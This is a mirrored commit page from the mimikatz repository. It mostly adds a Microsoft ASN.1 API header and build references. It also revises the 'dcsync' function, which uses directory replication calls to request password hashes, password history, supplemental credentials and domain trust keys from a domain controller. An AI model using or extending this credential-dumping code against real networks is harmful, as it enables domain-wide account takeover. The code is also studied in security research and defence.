RepoMirrors/mimikatz
1
0
Fork 0
mirror of https://github.com/gentilkiwi/mimikatz synced 2025-01-19 03:20:43 +00:00
Code Issues Packages Projects Releases Wiki Activity

[internal] ASN.1 OID encode/decode

Browse Source 
[internal] MS-DSRS with OID instead of standard ATT only
[internal] MS-DRSR function IDL_DRSAddEntry
This commit is contained in:
Benjamin DELPY 2017-01-07 03:45:34 +01:00
parent d8ee9e20ca
commit ea674c5073
14 changed files with 3182 additions and 409 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

987
inc/msasn1.h Normal file
View File

@ -0,0 +1,987 @@
/* Copyright (C) Boris Nikolaus, Germany, 1996-1997. All rights reserved. */
/* Copyright (C) Microsoft Corporation 1997-1998, All rights reserved. */
#ifndef __MS_ASN1_H__
#define __MS_ASN1_H__
#include <pshpack8.h> /* Assume 8 byte packing throughout */
#ifdef __cplusplus
extern "C" {
#endif
/* ------ Basic integer types ------ */
typedef unsigned char ASN1uint8_t;
typedef signed char ASN1int8_t;
typedef unsigned short ASN1uint16_t;
typedef signed short ASN1int16_t;
typedef unsigned long ASN1uint32_t;
typedef signed long ASN1int32_t;
/* ------ Function modifiers ------ */
#ifdef ASN1LIB
#define ASN1_PUBLIC
#elif defined(ASN1C)
#define ASN1_PUBLIC
#else
#define ASN1_PUBLIC __declspec(dllimport)
#endif
#define ASN1API __stdcall
#define ASN1CALL __stdcall
#ifdef _M_CEE_PURE
#define ASN1API_INLINE __clrcall
#else
#define ASN1API_INLINE ASN1API
#endif
/* ------ Basic ASN.1 types ------ */
typedef ASN1uint8_t ASN1octet_t;
typedef ASN1uint8_t ASN1bool_t;
typedef struct tagASN1intx_t
{
ASN1uint32_t length;
__field_bcount(length)
ASN1octet_t *value;
}
ASN1intx_t;
typedef struct tagASN1octetstring_t
{
ASN1uint32_t length;
__field_bcount(length)
ASN1octet_t *value;
}
ASN1octetstring_t;
typedef struct tagASN1octetstring2_t
{
ASN1uint32_t length;
ASN1octet_t value[1];
}
ASN1octetstring2_t;
typedef struct ASN1iterator_s
{
struct ASN1iterator_s *next;
void *value;
}
ASN1iterator_t;
typedef struct tagASN1bitstring_t
{
ASN1uint32_t length;
__field_bcount(length)
ASN1octet_t *value;
}
ASN1bitstring_t;
typedef char ASN1char_t;
typedef struct tagASN1charstring_t
{
ASN1uint32_t length;
__field_ecount(length)
ASN1char_t *value;
}
ASN1charstring_t;
typedef ASN1uint16_t ASN1char16_t;
typedef struct tagASN1char16string_t
{
ASN1uint32_t length;
__field_ecount(length)
ASN1char16_t *value;
}
ASN1char16string_t;
typedef ASN1uint32_t ASN1char32_t;
typedef struct tagASN1char32string_t
{
ASN1uint32_t length;
__field_ecount(length)
ASN1char32_t *value;
}
ASN1char32string_t;
typedef ASN1char_t *ASN1ztcharstring_t;
typedef ASN1char16_t *ASN1ztchar16string_t;
typedef ASN1char32_t *ASN1ztchar32string_t;
typedef struct tagASN1wstring_t
{
ASN1uint32_t length;
__field_ecount(length)
WCHAR *value;
}
ASN1wstring_t;
typedef struct ASN1objectidentifier_s
{
struct ASN1objectidentifier_s *next;
ASN1uint32_t value;
}
*ASN1objectidentifier_t;
typedef struct tagASN1objectidentifier2_t
{
__range(0, 16)
ASN1uint16_t count;
ASN1uint32_t value[16];
}
ASN1objectidentifier2_t;
typedef struct tagASN1encodedOID_t
{
ASN1uint16_t length;
__field_bcount(length)
ASN1octet_t *value;
}
ASN1encodedOID_t;
typedef ASN1ztcharstring_t ASN1objectdescriptor_t;
typedef struct tagASN1generalizedtime_t
{
ASN1uint16_t year;
ASN1uint8_t month;
ASN1uint8_t day;
ASN1uint8_t hour;
ASN1uint8_t minute;
ASN1uint8_t second;
ASN1uint16_t millisecond;
ASN1bool_t universal;
ASN1int16_t diff;
}
ASN1generalizedtime_t;
typedef struct tagASN1utctime_t
{
ASN1uint8_t year;
ASN1uint8_t month;
ASN1uint8_t day;
ASN1uint8_t hour;
ASN1uint8_t minute;
ASN1uint8_t second;
ASN1bool_t universal;
ASN1int16_t diff;
}
ASN1utctime_t;
typedef struct tagASN1open_t
{
// encoded
ASN1uint32_t length;
union
{
__field_bcount(length)
void *encoded;
__field_bcount(length)
void *value;
};
}
ASN1open_t;
typedef enum tagASN1blocktype_e
{
ASN1_DER_SET_OF_BLOCK,
}
ASN1blocktype_e;
typedef ASN1int32_t ASN1enum_t; // enumerated type
typedef ASN1uint16_t ASN1choice_t; // choice
typedef ASN1uint32_t ASN1magic_t;
/* ------ Current version of this ASN.1 software ------ */
#define ASN1_MAKE_VERSION(major,minor) (((major) << 16) | (minor))
#define ASN1_THIS_VERSION ASN1_MAKE_VERSION(1,0)
enum
{
ASN1_CHOICE_BASE = 1,
ASN1_CHOICE_INVALID = -1, // invalid choice
ASN1_CHOICE_EXTENSION = 0, // extension choice
};
/*
Error codes for decoding functions:
- err == 0: data has been successfully decoded
- err < 0: fatal error has occured, no data has been generated
err contains the error number
- err > 0: non-fatal event has occured, data has been generated
err is a bit set of occured events
*/
typedef enum tagASN1error_e
{
ASN1_SUCCESS = 0, /* success */
// Teles specific error codes
ASN1_ERR_INTERNAL = (-1001), /* internal error */
ASN1_ERR_EOD = (-1002), /* unexpected end of data */
ASN1_ERR_CORRUPT = (-1003), /* corrupted data */
ASN1_ERR_LARGE = (-1004), /* value too large */
ASN1_ERR_CONSTRAINT = (-1005), /* constraint violated */
ASN1_ERR_MEMORY = (-1006), /* out of memory */
ASN1_ERR_OVERFLOW = (-1007), /* buffer overflow */
ASN1_ERR_BADPDU = (-1008), /* function not supported for this pdu*/
ASN1_ERR_BADARGS = (-1009), /* bad arguments to function call */
ASN1_ERR_BADREAL = (-1010), /* bad real value */
ASN1_ERR_BADTAG = (-1011), /* bad tag value met */
ASN1_ERR_CHOICE = (-1012), /* bad choice value */
ASN1_ERR_RULE = (-1013), /* bad encoding rule */
ASN1_ERR_UTF8 = (-1014), /* bad unicode (utf8) */
// New error codes
ASN1_ERR_PDU_TYPE = (-1051), /* bad pdu type */
ASN1_ERR_NYI = (-1052), /* not yet implemented */
// Teles specific warning codes
ASN1_WRN_EXTENDED = 1001, /* skipped unknown extension(s) */
ASN1_WRN_NOEOD = 1002, /* end of data expected */
}
ASN1error_e;
#define ASN1_SUCCEEDED(ret) (((int) (ret)) >= 0)
#define ASN1_FAILED(ret) (((int) (ret)) < 0)
/* ------ Encoding rules ------ */
typedef enum
{
ASN1_BER_RULE_BER = 0x0100,
ASN1_BER_RULE_CER = 0x0200,
ASN1_BER_RULE_DER = 0x0400,
ASN1_BER_RULE = ASN1_BER_RULE_BER | ASN1_BER_RULE_CER | ASN1_BER_RULE_DER,
}
ASN1encodingrule_e;
/* ------ public structures ------ */
typedef struct ASN1encoding_s *ASN1encoding_t;
typedef struct ASN1decoding_s *ASN1decoding_t;
typedef ASN1int32_t (ASN1CALL *ASN1BerEncFun_t)( __in ASN1encoding_t enc, ASN1uint32_t tag, __in void *data);
typedef ASN1int32_t (ASN1CALL *ASN1BerDecFun_t)( __in ASN1decoding_t enc, ASN1uint32_t tag, __out void *data);
typedef struct tagASN1BerFunArr_t
{
const ASN1BerEncFun_t *apfnEncoder;
const ASN1BerDecFun_t *apfnDecoder;
}
ASN1BerFunArr_t;
typedef void (ASN1CALL *ASN1GenericFun_t)(void);
typedef void (ASN1CALL *ASN1FreeFun_t)( __in void *data);
typedef struct tagASN1module_t
{
ASN1magic_t nModuleName;
ASN1encodingrule_e eRule;
ASN1uint32_t dwFlags;
ASN1uint32_t cPDUs;
__field_xcount(cPDUs)
const ASN1FreeFun_t *apfnFreeMemory;
__field_xcount(cPDUs)
const ASN1uint32_t *acbStructSize;
ASN1BerFunArr_t BER;
}
*ASN1module_t;
struct ASN1encoding_s
{
ASN1magic_t magic; /* magic for this structure */
ASN1uint32_t version;/* version number of this library */
ASN1module_t module; /* module this encoding_t depends to */
__field_bcount(size)
ASN1octet_t *buf; /* buffer to encode into */
ASN1uint32_t size; /* current size of buffer */
ASN1uint32_t len; /* len of encoded data in buffer */
ASN1error_e err; /* error code for last encoding */
ASN1uint32_t bit;
ASN1octet_t *pos;
ASN1uint32_t cbExtraHeader;
ASN1encodingrule_e eRule;
ASN1uint32_t dwFlags;
};
struct ASN1decoding_s
{
ASN1magic_t magic; /* magic for this structure */
ASN1uint32_t version;/* version number of this library */
ASN1module_t module; /* module this decoding_t depends to */
__field_bcount(size)
ASN1octet_t *buf; /* buffer to decode from */
ASN1uint32_t size; /* size of buffer */
ASN1uint32_t len; /* len of decoded data in buffer */
ASN1error_e err; /* error code for last decoding */
ASN1uint32_t bit;
ASN1octet_t *pos;
ASN1encodingrule_e eRule;
ASN1uint32_t dwFlags;
};
/* --- flags for functions --- */
#define ASN1DECFREE_NON_PDU_ID ((ASN1uint32_t) -1)
enum
{
ASN1FLAGS_NONE = 0x00000000L, /* no flags */
ASN1FLAGS_NOASSERT = 0x00001000L, /* no asertion */
};
enum
{
ASN1ENCODE_APPEND = 0x00000001L, /* append to current buffer*/
ASN1ENCODE_REUSEBUFFER = 0x00000004L, /* empty destination buffer */
ASN1ENCODE_SETBUFFER = 0x00000008L, /* use a user-given destination buffer */
ASN1ENCODE_ALLOCATEBUFFER = 0x00000010L, /* do not free/reuse buffer */
ASN1ENCODE_NOASSERT = ASN1FLAGS_NOASSERT, /* no asertion */
};
enum
{
ASN1DECODE_APPENDED = 0x00000001L, /* continue behind last pdu*/
ASN1DECODE_REWINDBUFFER = 0x00000004L, /* rescan from buffer start*/
ASN1DECODE_SETBUFFER = 0x00000008L, /* use a user-given src buffer */
ASN1DECODE_AUTOFREEBUFFER = 0x00000010L, /* Assume responsibility for allocated buffer */
ASN1DECODE_NOASSERT = ASN1FLAGS_NOASSERT, /* no asertion */
};
/*****************************************************************************
ASN1_CreateModule
*****************************************************************************/
extern ASN1_PUBLIC
ASN1module_t
ASN1API
ASN1_CreateModule(
ASN1uint32_t nVersion,
ASN1encodingrule_e eRule,
ASN1uint32_t dwFlags, /* ASN1FLAGS_NONE or ASN1FLAGS_NOASSERT */
ASN1uint32_t cPDU,
const ASN1GenericFun_t apfnEncoder[],
const ASN1GenericFun_t apfnDecoder[],
const ASN1FreeFun_t apfnFreeMemory[],
const ASN1uint32_t acbStructSize[],
ASN1magic_t nModuleName
);
/*****************************************************************************
ASN1_CloseModule
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1_CloseModule(
__in ASN1module_t pModule
);
/*****************************************************************************
ASN1_CreateEncoder
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_CreateEncoder(
__in ASN1module_t pModule,
__deref_out ASN1encoding_t *ppEncoderInfo,
__in_bcount_opt( cbBufSize )
ASN1octet_t *pbBuf,
ASN1uint32_t cbBufSize,
__in_opt ASN1encoding_t pParent
);
/*****************************************************************************
ASN1_Encode
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_Encode(
__in ASN1encoding_t pEncoderInfo,
__in void *pDataStruct,
ASN1uint32_t nPduNum,
ASN1uint32_t dwFlags,
__out_bcount_opt( cbBufSize )
ASN1octet_t *pbBuf,
ASN1uint32_t cbBufSize
);
/*****************************************************************************
ASN1_CloseEncoder
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1_CloseEncoder(
__in ASN1encoding_t pEncoderInfo
);
/*****************************************************************************
ASN1_CloseEncoder2
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1_CloseEncoder2(
__in ASN1encoding_t pEncoderInfo
);
/*****************************************************************************
ASN1_CreateDecoder
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_CreateDecoder(
__in ASN1module_t pModule,
__deref_out ASN1decoding_t *ppDecoderInfo,
__in_bcount_opt(cbBufSize)
ASN1octet_t *pbBuf,
ASN1uint32_t cbBufSize,
__in_opt ASN1decoding_t pParent
);
/*****************************************************************************
ASN1_CreateDecoderEx
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_CreateDecoderEx(
__in ASN1module_t pModule,
__deref_out ASN1decoding_t *ppDecoderInfo,
__in_bcount_opt(cbBufSize)
ASN1octet_t *pbBuf,
ASN1uint32_t cbBufSize,
__in_opt ASN1decoding_t pParent,
ASN1uint32_t dwFlags
);
/*****************************************************************************
ASN1_Decode
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_Decode(
__in ASN1decoding_t pDecoderInfo,
__deref_out void **ppDataStruct,
ASN1uint32_t nPduNum,
ASN1uint32_t dwFlags,
__in_bcount(cbBufSize)
ASN1octet_t *pbBuf,
ASN1uint32_t cbBufSize
);
/*****************************************************************************
ASN1_CloseDecoder
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1_CloseDecoder(
__in ASN1decoding_t pDecoderInfo
);
/*****************************************************************************
ASN1_FreeEncoded
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1_FreeEncoded(
__in ASN1encoding_t pEncoderInfo,
__in void *pBuf
);
/*****************************************************************************
ASN1_FreeDecoded
*****************************************************************************/
extern
ASN1_PUBLIC
void
ASN1API
ASN1_FreeDecoded(
__in ASN1decoding_t pDecoderInfo,
__in void *pDataStruct,
ASN1uint32_t nPduNum
);
/*****************************************************************************
Options
*****************************************************************************/
typedef enum
{
// common set option
ASN1OPT_CHANGE_RULE = 0x101,
// common get option
ASN1OPT_GET_RULE = 0x201,
// set encoder option
ASN1OPT_NOT_REUSE_BUFFER = 0x301,
ASN1OPT_REWIND_BUFFER = 0x302,
// get encoder option
// set decoder option
ASN1OPT_SET_DECODED_BUFFER = 0x501,
ASN1OPT_DEL_DECODED_BUFFER = 0x502,
// get decoder option
ASN1OPT_GET_DECODED_BUFFER_SIZE = 0x601,
}
ASN1option_e;
typedef struct tagASN1optionparam_t
{
ASN1option_e eOption;
union
{
ASN1encodingrule_e eRule;
ASN1uint32_t cbRequiredDecodedBufSize;
struct
{
ASN1octet_t *pbBuf;
ASN1uint32_t cbBufSize;
} Buffer;
};
}
ASN1optionparam_t, ASN1optionparam_s;
/*****************************************************************************
ASN1_SetEncoderOption
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_SetEncoderOption(
__in ASN1encoding_t pEncoderInfo,
__in ASN1optionparam_t *pOptParam
);
/*****************************************************************************
ASN1_GetEncoderOption
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_GetEncoderOption(
__in ASN1encoding_t pEncoderInfo,
__inout ASN1optionparam_t *pOptParam
);
/*****************************************************************************
ASN1_SetDecoderOption
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_SetDecoderOption(
__in ASN1decoding_t pDecoderInfo,
__in ASN1optionparam_t *pOptParam
);
/*****************************************************************************
ASN1_GetDecoderOption
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1_GetDecoderOption(
__in ASN1decoding_t pDecoderInfo,
__inout ASN1optionparam_t *pOptParam
);
/*****************************************************************************
XXX_free
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1bitstring_free(
__in ASN1bitstring_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1octetstring_free(
__in ASN1octetstring_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1objectidentifier_free(
__in ASN1objectidentifier_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1charstring_free(
__in ASN1charstring_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1char16string_free(
__in ASN1char16string_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1char32string_free(
__in ASN1char32string_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1ztcharstring_free(
__in ASN1ztcharstring_t
);
extern ASN1_PUBLIC
void
ASN1API
ASN1ztchar16string_free(
__in ASN1ztchar16string_t
);
extern ASN1_PUBLIC
void
ASN1API
ASN1ztchar32string_free(
__in ASN1ztchar32string_t
);
extern ASN1_PUBLIC
void
ASN1API
ASN1open_free(
__in ASN1open_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1utf8string_free(
__in ASN1wstring_t *
);
/*****************************************************************************
ASN1DecAlloc
*****************************************************************************/
extern ASN1_PUBLIC
__out_bcount_opt( size )
LPVOID
ASN1API
ASN1DecAlloc(
__in ASN1decoding_t dec,
ASN1uint32_t size
);
/*****************************************************************************
ASN1DecRealloc
*****************************************************************************/
extern ASN1_PUBLIC
__out_bcount_opt( size )
LPVOID
ASN1API
ASN1DecRealloc(
__in ASN1decoding_t dec,
__in LPVOID ptr,
ASN1uint32_t size
);
/*****************************************************************************
ASN1Free
*****************************************************************************/
extern ASN1_PUBLIC
void
ASN1API
ASN1Free(
__in LPVOID ptr
);
/*****************************************************************************
ASN1EncSetError
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API ASN1EncSetError(
__in ASN1encoding_t enc,
ASN1error_e err
);
/*****************************************************************************
ASN1EncSetError
*****************************************************************************/
extern ASN1_PUBLIC
__success( return >= 0 )
ASN1error_e
ASN1API
ASN1DecSetError(
__in ASN1decoding_t dec,
ASN1error_e err
);
/*****************************************************************************
intx conversions
*****************************************************************************/
extern ASN1_PUBLIC
ASN1uint32_t
ASN1API
ASN1intx_uoctets(
__in ASN1intx_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1intx_free(
__in ASN1intx_t *
);
extern ASN1_PUBLIC
ASN1int32_t
ASN1API
ASN1intx2int32(
__in ASN1intx_t *
);
extern ASN1_PUBLIC
ASN1uint32_t
ASN1API
ASN1intx2uint32(
__in ASN1intx_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1intxisuint32(
__in ASN1intx_t *
);
extern ASN1_PUBLIC
void
ASN1API
ASN1intx_setuint32(
__out ASN1intx_t *dst,
ASN1uint32_t val
);
/*****************************************************************************
ASN1uint32_uoctets
count octets for unsigned encoding of an uint32 value
*****************************************************************************/
extern ASN1_PUBLIC
ASN1uint32_t
ASN1API
ASN1uint32_uoctets(
ASN1uint32_t
);
/*****************************************************************************
Comparisson APIs
*****************************************************************************/
extern ASN1_PUBLIC
int
ASN1API
ASN1intx_cmp(
__in ASN1intx_t *,
__in ASN1intx_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1objectidentifier_cmp(
__in ASN1objectidentifier_t *,
__in ASN1objectidentifier_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1objectidentifier2_cmp(
__in ASN1objectidentifier2_t *,
__in ASN1objectidentifier2_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1bitstring_cmp(
__in ASN1bitstring_t *,
__in ASN1bitstring_t *,
int
);
extern ASN1_PUBLIC
int
ASN1API
ASN1octetstring_cmp(
__in ASN1octetstring_t *,
__in ASN1octetstring_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1charstring_cmp(
__in ASN1charstring_t *,
__in ASN1charstring_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1char16string_cmp(
__in ASN1char16string_t *,
__in ASN1char16string_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1char32string_cmp(
__in ASN1char32string_t *,
__in ASN1char32string_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1ztcharstring_cmp(
__in_z ASN1ztcharstring_t,
__in_z ASN1ztcharstring_t
);
extern ASN1_PUBLIC
int
ASN1API
ASN1ztchar16string_cmp(
__in_z ASN1ztchar16string_t,
__in_z ASN1ztchar16string_t
);
extern ASN1_PUBLIC
int
ASN1API
ASN1ztchar32string_cmp(
__in_z ASN1ztchar32string_t,
__in_z ASN1ztchar32string_t
);
extern ASN1_PUBLIC
int
ASN1API
ASN1open_cmp(
__in ASN1open_t *,
__in ASN1open_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1generalizedtime_cmp(
__in ASN1generalizedtime_t *,
__in ASN1generalizedtime_t *
);
extern ASN1_PUBLIC
int
ASN1API
ASN1utctime_cmp(
__in ASN1utctime_t *,
__in ASN1utctime_t *
);
#ifdef __cplusplus
}
#endif
#include <poppack.h> /* End 8-byte packing */
#endif // __MS_ASN1_H__

BIN
lib/Win32/msasn1.min.lib Normal file
View File

Binary file not shown.

BIN
lib/x64/msasn1.min.lib Normal file
View File

Binary file not shown.

3
mimikatz.sln
View File

@ -15,6 +15,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "inc", "inc", "{282B4B77-BFF
inc\DsGetDC.h = inc\DsGetDC.h
inc\globals.h = inc\globals.h
inc\Midles.h = inc\Midles.h
inc\msasn1.h = inc\msasn1.h
inc\NTSecPKG.h = inc\NTSecPKG.h
inc\PshPack8.h = inc\PshPack8.h
inc\schannel.h = inc\schannel.h
@ -32,6 +33,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Win32", "Win32", "{96078881
lib\Win32\advapi32.hash.lib = lib\Win32\advapi32.hash.lib
lib\Win32\cryptdll.lib = lib\Win32\cryptdll.lib
lib\Win32\hid.lib = lib\Win32\hid.lib
lib\Win32\msasn1.min.lib = lib\Win32\msasn1.min.lib
lib\Win32\netapi32.min.lib = lib\Win32\netapi32.min.lib
lib\Win32\ntdll.min.lib = lib\Win32\ntdll.min.lib
lib\Win32\samlib.lib = lib\Win32\samlib.lib
@ -42,6 +44,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "x64", "x64", "{E9D1619F-D4A
lib\x64\advapi32.hash.lib = lib\x64\advapi32.hash.lib
lib\x64\cryptdll.lib = lib\x64\cryptdll.lib
lib\x64\hid.lib = lib\x64\hid.lib
lib\x64\msasn1.min.lib = lib\x64\msasn1.min.lib
lib\x64\netapi32.min.lib = lib\x64\netapi32.min.lib
lib\x64\ntdll.min.lib = lib\x64\ntdll.min.lib
lib\x64\samlib.lib = lib\x64\samlib.lib

2
mimikatz/mimikatz.c
View File

@ -98,6 +98,7 @@ NTSTATUS mimikatz_initOrClean(BOOL Init)
hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
if(FAILED(hr))
PRINT_ERROR(L"CoInitializeEx: %08x\n", hr);
kull_m_asn1_init();
}
else
offsetToFunc = FIELD_OFFSET(KUHL_M, pClean);
@ -114,6 +115,7 @@ NTSTATUS mimikatz_initOrClean(BOOL Init)
if(!Init)
{
kull_m_asn1_term();
CoUninitialize();
kull_m_output_file(NULL);
}

2
mimikatz/mimikatz.vcxproj
View File

@ -78,7 +78,7 @@
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<AdditionalDependencies>advapi32.lib;crypt32.lib;cryptdll.lib;dnsapi.lib;msxml2.lib;netapi32.lib;ntdsapi.lib;ole32.lib;oleaut32.lib;rpcrt4.lib;shlwapi.lib;samlib.lib;secur32.lib;shell32.lib;user32.lib;hid.lib;setupapi.lib;winscard.lib;wldap32.lib;advapi32.hash.lib;ntdll.min.lib;netapi32.min.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>advapi32.lib;crypt32.lib;cryptdll.lib;dnsapi.lib;msxml2.lib;netapi32.lib;ntdsapi.lib;ole32.lib;oleaut32.lib;rpcrt4.lib;shlwapi.lib;samlib.lib;secur32.lib;shell32.lib;user32.lib;hid.lib;setupapi.lib;winscard.lib;wldap32.lib;advapi32.hash.lib;msasn1.min.lib;ntdll.min.lib;netapi32.min.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AssemblyDebug>false</AssemblyDebug>
<DataExecutionPrevention>true</DataExecutionPrevention>
<LinkErrorReporting>NoErrorReport</LinkErrorReporting>

151
mimikatz/modules/kuhl_m_lsadump.c
View File

@ -1677,6 +1677,15 @@ NTSTATUS kuhl_m_lsadump_rpdata(int argc, wchar_t * argv[])
/* This function `dcsync` was co-writed with
Vincent LE TOUX ( vincent.letoux@gmail.com / http://www.mysmartlogon.com )
*/
LPCSTR kuhl_m_lsadump_dcsync_oids[] = {
szOID_ANSI_name,
szOID_ANSI_sAMAccountName, szOID_ANSI_userPrincipalName, szOID_ANSI_sAMAccountType,
szOID_ANSI_userAccountControl, szOID_ANSI_accountExpires, szOID_ANSI_pwdLastSet,
szOID_ANSI_objectSid, szOID_ANSI_sIDHistory,
szOID_ANSI_unicodePwd, szOID_ANSI_ntPwdHistory, szOID_ANSI_dBCSPwd, szOID_ANSI_lmPwdHistory, szOID_ANSI_supplementalCredentials,
szOID_ANSI_trustPartner, szOID_ANSI_trustAuthIncoming, szOID_ANSI_trustAuthOutgoing,
//szOID_ANSI_currentValue,
};
NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
{
LSA_OBJECT_ATTRIBUTES objectAttributes = {0};
@ -1685,7 +1694,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
DRS_HANDLE hDrs = NULL;
DSNAME dsName = {0};
DRS_MSG_GETCHGREQ getChReq = {0};
DWORD dwOutVersion = 0;
DWORD dwOutVersion = 0, i;
DRS_MSG_GETCHGREPLY getChRep = {0};
ULONG drsStatus;
LPCWSTR szUser = NULL, szGuid = NULL, szDomain = NULL, szDc = NULL;
@ -1727,28 +1736,38 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
getChReq.V8.cMaxBytes = 0x00a00000; // 10M
getChReq.V8.ulExtendedOp = EXOP_REPL_OBJ;
RpcTryExcept
if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * (ARRAYSIZE(kuhl_m_lsadump_dcsync_oids) - 1)))
{
drsStatus = IDL_DRSGetNCChanges(hDrs, 8, &getChReq, &dwOutVersion, &getChRep);
if(drsStatus == 0)
getChReq.V8.pPartialAttrSet->dwVersion = 1;
getChReq.V8.pPartialAttrSet->dwReserved1 = 0;
getChReq.V8.pPartialAttrSet->cAttrs = ARRAYSIZE(kuhl_m_lsadump_dcsync_oids);
for(i = 0; i < getChReq.V8.pPartialAttrSet->cAttrs; i++)
kull_m_rpc_drsr_MakeAttid(&getChReq.V8.PrefixTableDest, kuhl_m_lsadump_dcsync_oids[i], &getChReq.V8.pPartialAttrSet->rgPartialAttr[i], TRUE);
RpcTryExcept
{
if((dwOutVersion == 6) && (getChRep.V6.cNumObjects == 1))
drsStatus = IDL_DRSGetNCChanges(hDrs, 8, &getChReq, &dwOutVersion, &getChRep);
if(drsStatus == 0)
{
if(kull_m_rpc_drsr_ProcessGetNCChangesReply(getChRep.V6.pObjects))
if((dwOutVersion == 6) && (getChRep.V6.cNumObjects == 1))
{
kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.pObjects[0].Entinf.AttrBlock, szDomain);
if(kull_m_rpc_drsr_ProcessGetNCChangesReply(&getChRep.V6.PrefixTableSrc, getChRep.V6.pObjects))
kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &getChRep.V6.pObjects[0].Entinf.AttrBlock, szDomain);
else PRINT_ERROR(L"kull_m_rpc_drsr_ProcessGetNCChangesReply\n");
}
else PRINT_ERROR(L"kull_m_rpc_drsr_ProcessGetNCChangesReply\n");
else PRINT_ERROR(L"DRSGetNCChanges, invalid dwOutVersion (%u) and/or cNumObjects (%u)\n", dwOutVersion, getChRep.V6.cNumObjects);
kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(dwOutVersion, &getChRep);
}
else PRINT_ERROR(L"DRSGetNCChanges, invalid dwOutVersion (%u) and/or cNumObjects (%u)\n", dwOutVersion, getChRep.V6.cNumObjects);
kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(dwOutVersion, &getChRep);
else PRINT_ERROR(L"GetNCChanges: 0x%08x (%u)\n", drsStatus, drsStatus);
IDL_DRSUnbind(&hDrs);
}
else PRINT_ERROR(L"GetNCChanges: 0x%08x (%u)\n", drsStatus, drsStatus);
IDL_DRSUnbind(&hDrs);
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
kull_m_rpc_drsr_free_SCHEMA_PREFIX_TABLE_data(&getChReq.V8.PrefixTableDest);
MIDL_user_free(getChReq.V8.pPartialAttrSet);
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
}
}
kull_m_rpc_deleteBinding(&hBinding);
@ -1768,44 +1787,6 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}
PVOID kuhl_m_lsadump_dcsync_findMonoAttr(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size)
{
PVOID ptr = NULL;
DWORD i;
ATTR *attribut;
if(data)
*(PVOID *)data = NULL;
if(size)
*size = 0;
for(i = 0; i < attributes->attrCount; i++)
{
attribut = &attributes->pAttr[i];
if(attribut->attrTyp == type)
{
if(attribut->AttrVal.valCount == 1)
{
ptr = attribut->AttrVal.pAVal[0].pVal;
if(data)
*(PVOID *)data = ptr;
if(size)
*size = attribut->AttrVal.pAVal[0].valLen;
}
break;
}
}
return ptr;
}
